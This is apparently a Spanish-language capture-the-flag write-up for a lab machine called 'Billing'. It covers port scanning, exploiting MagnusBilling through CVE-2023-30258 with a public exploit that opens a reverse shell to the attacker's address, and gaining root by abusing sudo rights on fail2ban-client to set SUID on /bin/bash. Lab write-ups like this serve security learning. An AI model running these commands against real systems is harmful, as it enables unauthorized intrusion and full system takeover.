# Billing

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 10.10.118.35
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FUhYtxKeSmu4fvt8Ua7zm%2Fimage.png?alt=media&#x26;token=1cb82bcf-6cf1-4c74-a3ae-be745f8df5d0" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap 10.10.118.35
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FL6WcagZUnYPK0q9QJT9a%2Fimage.png?alt=media&#x26;token=431f1699-501a-4d31-8093-d6d13d33f2e0" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo el puerto **22** perteneciente al servicio **SSH,** el puerto **80** perteneciente al servicio **HTTP** y el puerto **3306** perteneciente a **MySQL** están abiertos, por lo que se procederá a indagar más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80,3306 -v 10.10.118.35
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FXTOXu0uRC17t3hqr8pH2%2Fimage.png?alt=media&#x26;token=e42da25e-aa93-4836-bf6b-258f93ec3ae7" alt=""><figcaption></figcaption></figure>

Revisamos el puerto 80.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FDHCH6oP4HFAVHGjLy3Wh%2FCaptura%20de%20pantalla%202025-06-20%20213144.png?alt=media&#x26;token=8cc13027-d997-41f4-8dc9-fcf4f89c545c" alt=""><figcaption></figcaption></figure>

Es un panel de **MagnusBilling** por lo que ahora haremos un escaneo de directorios por si hay algo relevante.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://10.10.118.35
```

Encontramos un directorio interesante donde nos menciona la versión y así poder encontrar vulnerabilidad.&#x20;

<div><figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FcZKsYwK4aTNYZPbmCKql%2Fimage.png?alt=media&#x26;token=428c6276-3407-40cf-891b-dc73e5fb2481" alt=""><figcaption></figcaption></figure> <figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FwZ5xAkVvldKUOWYDvUZP%2FCaptura%20de%20pantalla%202025-06-20%20215053.png?alt=media&#x26;token=535c29ac-50a0-4149-96a2-94f40eb47410" alt=""><figcaption></figcaption></figure></div>

### 🚀 **EXPLOTACIÓN**

{% @github-files/github-code-block url="<https://github.com/tinashelorenzi/CVE-2023-30258-magnus-billing-v7-exploit>" %}

```
git clone https://github.com/tinashelorenzi/CVE-2023-30258-magnus-billing-v7-exploit.git
cd CVE-2023-30258-magnus-billing-v7-exploit
```

Realizamos la Reverse Shell.

```
nc -nlvp 4444
python3 exploit.py -t 10.10.118.35 -a 10.8.146.101 -p 4444
```

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FRo7crM41lKTZwxsbmDvp%2Fimage.png?alt=media&#x26;token=4ef92c53-407a-4bca-9ba2-4a7eb2d3dcec" alt=""><figcaption></figcaption></figure>

Hacemos tratamiento de la TTY.

```
script /dev/null -c bash
CTRL+Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
```

Tenemos permiso sudo del binario **fail2ban-client**.

{% embed url="<https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-client-privilege-escalation/>" %}

```bash
sudo /usr/bin/fail2ban-client status
sudo /usr/bin/fail2ban-client get ast-cli-attck actions
sudo /usr/bin/fail2ban-client set ast-cli-attck addaction evil
sudo /usr/bin/fail2ban-client set ast-cli-attck action evil actionban "chmod +s /bin/bash"
sudo /usr/bin/fail2ban-client set ast-cli-attck banip 1.2.3.5
/bin/bash -p
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FLG4hv3MKbsGf3bsamHWW%2Fimage.png?alt=media&#x26;token=4bfbc1ea-7e4c-4313-9b1d-f09631cdd355" alt=""><figcaption></figcaption></figure>
